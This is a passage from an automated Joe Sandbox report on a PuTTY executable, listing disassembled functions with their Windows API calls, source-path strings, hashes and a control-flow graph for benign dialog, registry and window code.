                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$BUTTON$ncols <= lenof(columns)$ret == c
                                                          • API String ID: 3850602802-31935564
                                                          • Opcode ID: 888972b9db0f87303aa70a6779f7a6328b4eb413788c9e3f4fdc958fe365f4e5
                                                          • Instruction ID: 00a78125955d9ade71442ad97abcdae4174fcb2eb0de6360c22a968a6a97c25d
                                                          • Opcode Fuzzy Hash: 888972b9db0f87303aa70a6779f7a6328b4eb413788c9e3f4fdc958fe365f4e5
                                                          • Instruction Fuzzy Hash: 9FD1A0A3A096C696EB20AB19E4417BAF360FF84794F845231DF8943694EF3ED184D718
                                                          Function 00007FF738A728B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 43registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$ClassCreateRegisterShow
                                                          • String ID: PuTTY: hidden timing window$PuTTYTimerWindow$d$d
                                                          • API String ID: 468106867-1820741264
                                                          • Opcode ID: ceccfd45682ea90d544214e5ab036f90fdc32730d8e271381707cc569760fa46
                                                          • Instruction ID: 44e0022833dd2d376f7a83a1066de937308454740353bbccb3bfcafa03c67c46
                                                          • Opcode Fuzzy Hash: ceccfd45682ea90d544214e5ab036f90fdc32730d8e271381707cc569760fa46
                                                          • Instruction Fuzzy Hash: 5F216A62908BC2A2E7619B14F4413E7F3A4FF88744F800225EA8D02724DF3ED196DB15
                                                          Function 00007FF738A68690 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 399COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2866 7ff738a68690-7ff738a686a1 2867 7ff738a686de-7ff738a68704 call 7ff738a6f720 * 2 2866->2867 2868 7ff738a686a3-7ff738a686b2 call 7ff738a6fd50 2866->2868 2873 7ff738a68705 call 7ff738a68e00 2868->2873 2874 7ff738a686b4-7ff738a686d9 call 7ff738a6efd0 * 2 2868->2874 2879 7ff738a6870a-7ff738a6870d 2873->2879 2888 7ff738a6875f-7ff738a6877f call 7ff738a6fe90 2874->2888 2881 7ff738a68751-7ff738a6875a call 7ff738a6ecc0 2879->2881 2882 7ff738a6870f-7ff738a6871f call 7ff738a68e60 2879->2882 2881->2888 2889 7ff738a68749-7ff738a6874c call 7ff738a689a0 2882->2889 2890 7ff738a68721-7ff738a6872f 2882->2890 2895 7ff738a687be-7ff738a687e6 call 7ff738a6f680 2888->2895 2896 7ff738a68781-7ff738a68789 2888->2896 2889->2881 2893 7ff738a68730-7ff738a68747 call 7ff738a6ecc0 call 7ff738a68e60 2890->2893 2893->2889 2906 7ff738a6882e-7ff738afdceb 2895->2906 2907 7ff738a687e8-7ff738a687fe 2895->2907 2898 7ff738a68790-7ff738a6879d call 7ff738afe580 2896->2898 2909 7ff738a6879f-7ff738a687af 2898->2909 2910 7ff738a687b0-7ff738a687b7 2898->2910 2912 7ff738afdced-7ff738afdcf0 2906->2912 2913 7ff738afdd07-7ff738afdd0a 2906->2913 2911 7ff738a68800-7ff738a6880d call 7ff738afe580 2907->2911 2909->2910 2910->2910 2914 7ff738a687b9-7ff738a687bc 2910->2914 2921 7ff738a6880f-7ff738a6881d 2911->2921 2922 7ff738a68820-7ff738a68827 2911->2922 2912->2913 2916 7ff738afdcf2-7ff738afdd02 call 7ff738af8ec8 call 7ff738b02f2c 2912->2916 2913->2916 2917 7ff738afdd0c-7ff738afdd0f 2913->2917 2914->2895 2914->2898 2925 7ff738afe0b0-7ff738afe0cd call 7ff738ae9230 2916->2925 2917->2916 2920 7ff738afdd11-7ff738afdd15 2917->2920 2920->2925 2926 7ff738afdd1b-7ff738afdd55 2920->2926 2921->2922 2922->2922 2923 7ff738a68829-7ff738a6882c 2922->2923 2923->2906 2923->2911 2929 7ff738afdd60-7ff738afdd73 2926->2929 2932 7ff738afde14-7ff738afde3a 2929->2932 2933 7ff738afdd79-7ff738afdd7c 2929->2933 2940 7ff738afde3c-7ff738afde45 2932->2940 2941 7ff738afde6b-7ff738afde86 2932->2941 2934 7ff738afddf3-7ff738afddfc 2933->2934 2935 7ff738afdd7e 2933->2935 2937 7ff738afde02-7ff738afde0f 2934->2937 2938 7ff738afe088-7ff738afe0a8 2934->2938 2936 7ff738afdd82-7ff738afdd8b 2935->2936 2942 7ff738afdd8d 2936->2942 2943 7ff738afddb7-7ff738afddc0 2936->2943 2937->2929 2938->2925 2940->2941 2944 7ff738afde47 2940->2944 2953 7ff738afdeb8-7ff738afded3 2941->2953 2954 7ff738afde88-7ff738afde91 2941->2954 2945 7ff738afdd90-7ff738afddb5 2942->2945 2946 7ff738afdde6-7ff738afddec 2943->2946 2947 7ff738afddc2-7ff738afddc5 2943->2947 2948 7ff738afde50-7ff738afde69 2944->2948 2945->2943 2946->2936 2951 7ff738afddee 2946->2951 2950 7ff738afddd0-7ff738afdde4 2947->2950 2948->2941 2948->2948 2950->2946 2950->2950 2951->2934 2958 7ff738afded5-7ff738afdede 2953->2958 2959 7ff738afdf08-7ff738afdf0e 2953->2959 2954->2953 2955 7ff738afde93-7ff738afde99 2954->2955 2956 7ff738afdea0-7ff738afdeb6 2955->2956 2956->2953 2956->2956 2958->2959 2961 7ff738afdee0-7ff738afdee6 2958->2961 2960 7ff738afdf10-7ff738afdf13 2959->2960 2962 7ff738afdf15-7ff738afdf1b 2960->2962 2963 7ff738afdf40-7ff738afdf46 2960->2963 2964 7ff738afdef0-7ff738afdf06 2961->2964 2962->2963 2965 7ff738afdf1d-7ff738afdf38 2962->2965 2966 7ff738afdf65-7ff738afdf6e 2963->2966 2967 7ff738afdf48-7ff738afdf63 2963->2967 2964->2959 2964->2964 2965->2962 2978 7ff738afdf3a 2965->2978 2968 7ff738afdf70-7ff738afdf8b 2966->2968 2969 7ff738afdf8d-7ff738afdf90 2966->2969 2967->2963 2967->2966 2968->2966 2968->2969 2972 7ff738afdf92-7ff738afdf98 2969->2972 2973 7ff738afdfca-7ff738afdfcd 2969->2973 2974 7ff738afdf9a-7ff738afdf9d 2972->2974 2975 7ff738afdfb8-7ff738afdfc5 2972->2975 2976 7ff738afdfcf 2973->2976 2977 7ff738afdff7-7ff738afdffd 2973->2977 2980 7ff738afdfa0-7ff738afdfb6 2974->2980 2975->2960 2981 7ff738afdfd0-7ff738afdfd6 2976->2981 2982 7ff738afdfff-7ff738afe01a 2977->2982 2983 7ff738afe01c-7ff738afe030 2977->2983 2978->2966 2980->2975 2980->2980 2981->2977 2984 7ff738afdfd8-7ff738afdff3 2981->2984 2982->2977 2982->2983 2985 7ff738afe032-7ff738afe035 2983->2985 2986 7ff738afe05d-7ff738afe060 2983->2986 2984->2981 2995 7ff738afdff5 2984->2995 2987 7ff738afe04c-7ff738afe04f 2985->2987 2988 7ff738afe037-7ff738afe047 2985->2988 2989 7ff738afe062-7ff738afe072 2986->2989 2990 7ff738afe077-7ff738afe07a 2986->2990 2987->2934 2992 7ff738afe055-7ff738afe058 2987->2992 2988->2987 2989->2990 2990->2934 2993 7ff738afe080-7ff738afe083 2990->2993 2992->2929 2993->2929 2995->2983
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/config.c$Default Settings$demo-server$demo-server-2
                                                          • API String ID: 0-2776931361
                                                          • Opcode ID: 68d8b0708117a3f60a11f9262aaac6ea63088d957a9c9af79d727b7ed60e8252
                                                          • Instruction ID: df921ae8e4012dab22aa3793c5626b7818556a35748e0b73780c920f0520de1f
                                                          • Opcode Fuzzy Hash: 68d8b0708117a3f60a11f9262aaac6ea63088d957a9c9af79d727b7ed60e8252
                                                          • Instruction Fuzzy Hash: 32E10753B0B69261EA11BF219904BB9E795BB45FC0FC84432DE4D1B799DE3EE044B328
                                                          Function 00007FF738A54750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateDialogMessageRectSend
                                                          • String ID: LISTBOX
                                                          • API String ID: 4261271132-1812161947
                                                          • Opcode ID: 376979fbbbb993e7b581c4dc4b4f32f8f07b64b671213f1c4b318b74c80e8daf
                                                          • Instruction ID: 8cf361f8624af6f83b9aa2881c7db406d6bdf95a93a25a8644ca0469897fbbe3
                                                          • Opcode Fuzzy Hash: 376979fbbbb993e7b581c4dc4b4f32f8f07b64b671213f1c4b318b74c80e8daf
                                                          • Instruction Fuzzy Hash: A1216DB36096819BE7649F06F840A5AF7A0F788B94F548135EF8D43B54DB3DE441CB04
                                                          Function 00007FF738A592F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A59352
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A5934B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          • Opcode ID: b1c5a82064e813f525e8241b6ca4d4705a0faa2d44216f6cde3a4989ca45fddb
                                                          • Instruction ID: fd096c128e22e17c3457948a431673ecd4e79f4bae845c6503b0cda723931849
                                                          • Opcode Fuzzy Hash: b1c5a82064e813f525e8241b6ca4d4705a0faa2d44216f6cde3a4989ca45fddb
                                                          • Instruction Fuzzy Hash: 4921D773B0A605E6EB20AB16F844BB8F750FB84B94F894135DE4D4B790DA3EE484D314
                                                          Function 00007FF738A72CE0 Relevance: 6.1, APIs: 4, Instructions: 84registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DD1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DE5
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateOpen
                                                          • String ID:
                                                          • API String ID: 1299239824-0
                                                          • Opcode ID: 22116b737228f91f55719abfa2c8bdc5bafb1df9a520019b3b98160d7e1a6b1d
                                                          • Instruction ID: 7051732d0a492a6bed406f84871606e019f1ab951478a1ee4157c1aa9d934786
                                                          • Opcode Fuzzy Hash: 22116b737228f91f55719abfa2c8bdc5bafb1df9a520019b3b98160d7e1a6b1d
                                                          • Instruction Fuzzy Hash: 0331D833A0875252F620DB55B850B27F394EB84794F800131FD8E47B94DFBED441A714
                                                          Function 00007FF738A83C00 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$DesktopMove
                                                          • String ID:
                                                          • API String ID: 2894293738-0
                                                          • Opcode ID: 8318f6e9a4f60d159995f5206c495d45a406d97e588e19abbe112d34edb69c66
                                                          • Instruction ID: d89bb34e3f28c6740e81826646c452c359d78c53d99b68931dedf72bd790cdaf
                                                          • Opcode Fuzzy Hash: 8318f6e9a4f60d159995f5206c495d45a406d97e588e19abbe112d34edb69c66
                                                          • Instruction Fuzzy Hash: 2711E6B3B1850247EB10DB29F80491AFB60EBC5B90F489130EE4907B58DE3EE844CF84
                                                          Function 00007FF738A59210 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5926F
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A59268
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          • Opcode ID: 9cee2cfc156a64a14028ad657b4f71c2283428e151bb48cb4e61adf4fa2e26d5
                                                          • Instruction ID: 4da26660b9fcd60838e2f6053582b89abdf6822d5ec92a884cf7aa36e47c1fd5
                                                          • Opcode Fuzzy Hash: 9cee2cfc156a64a14028ad657b4f71c2283428e151bb48cb4e61adf4fa2e26d5
                                                          • Instruction Fuzzy Hash: 3421F673B0A605A1EB60AB16E944BA8F750EB89BD4F888131CE4D07B90DE3ED4C1D314
                                                          Function 00007FF738A5A760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                                                          • API String ID: 190572456-666802935
                                                          • Opcode ID: 97daad96f8dd9132152ad5b375d768b6c791c04396111a9b7e43a69ae2d8d88b
                                                          • Instruction ID: 4d8eac47a4e0ff57e834893a5f4da699b45e37320fc909ba0052014e06006c2f
                                                          • Opcode Fuzzy Hash: 97daad96f8dd9132152ad5b375d768b6c791c04396111a9b7e43a69ae2d8d88b
                                                          • Instruction Fuzzy Hash: ADF0E192F0BA03A1FA55B7109855774D2F0AF54B80FE40638C44D423A2EE3EB884B639
                                                          Function 00007FF738B0964C Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B09665
                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B096D7
                                                            • Part of subcall function 00007FF738B039A0: HeapAlloc.KERNEL32(?,?,?,00007FF738B0284F), ref: 00007FF738B039DE
                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B09736
                                                            • Part of subcall function 00007FF738B02E14: HeapFree.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E2A
                                                            • Part of subcall function 00007FF738B02E14: GetLastError.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E34
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                          • String ID:
                                                          • API String ID: 3331406755-0
                                                          • Opcode ID: 84e0f3bf98c2497efba8d052936615aad011f9005e658db50d2ce12355f2fb40
                                                          • Instruction ID: c541c49dc46a3705850b2a2fcbc260ea43a22bd29b8050d7dd6da85b730ff5fa
                                                          • Opcode Fuzzy Hash: 84e0f3bf98c2497efba8d052936615aad011f9005e658db50d2ce12355f2fb40
                                                          • Instruction Fuzzy Hash: C431B5A3E0874391EB24BF22644046AF690BB84BD4F884235E9AE437D5CF3DE411571B
                                                          Function 00007FF738A53FA0 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemLongText
                                                          • String ID:
                                                          • API String ID: 1037592912-0
                                                          • Opcode ID: 9eae9108fb7654e5cda1f3ea69b4accca2ddd8a454f0118b52d02bb184a25b4e
                                                          • Instruction ID: 88455a0de88e502f3e37a834c3bb3831d534a82c7d1f994f98e944424df20122
                                                          • Opcode Fuzzy Hash: 9eae9108fb7654e5cda1f3ea69b4accca2ddd8a454f0118b52d02bb184a25b4e
                                                          • Instruction Fuzzy Hash: D9F0A4D2A0A55292FA596756A840679D3909F8AFD0F549230C91D067E0CE3E5CC3A329
                                                          Function 00007FF738A51FC0 Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveCreateDialogParamShow
                                                          • String ID:
                                                          • API String ID: 4156068129-0
                                                          • Opcode ID: ebe4b40e719134981b0da6b25c2d37821524d70d280e203c5c71934ebd96dcd8
                                                          • Instruction ID: b0773c1c47beb908cad938632cefd543c44669dcb2379d9b56c5798043795c44
                                                          • Opcode Fuzzy Hash: ebe4b40e719134981b0da6b25c2d37821524d70d280e203c5c71934ebd96dcd8
                                                          • Instruction Fuzzy Hash: 39E0125AA1A92392F380AB25A8147B5E361AB89B50F804130CC4E03B10CE3E9956A619
                                                          Function 00007FF738A59F60 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
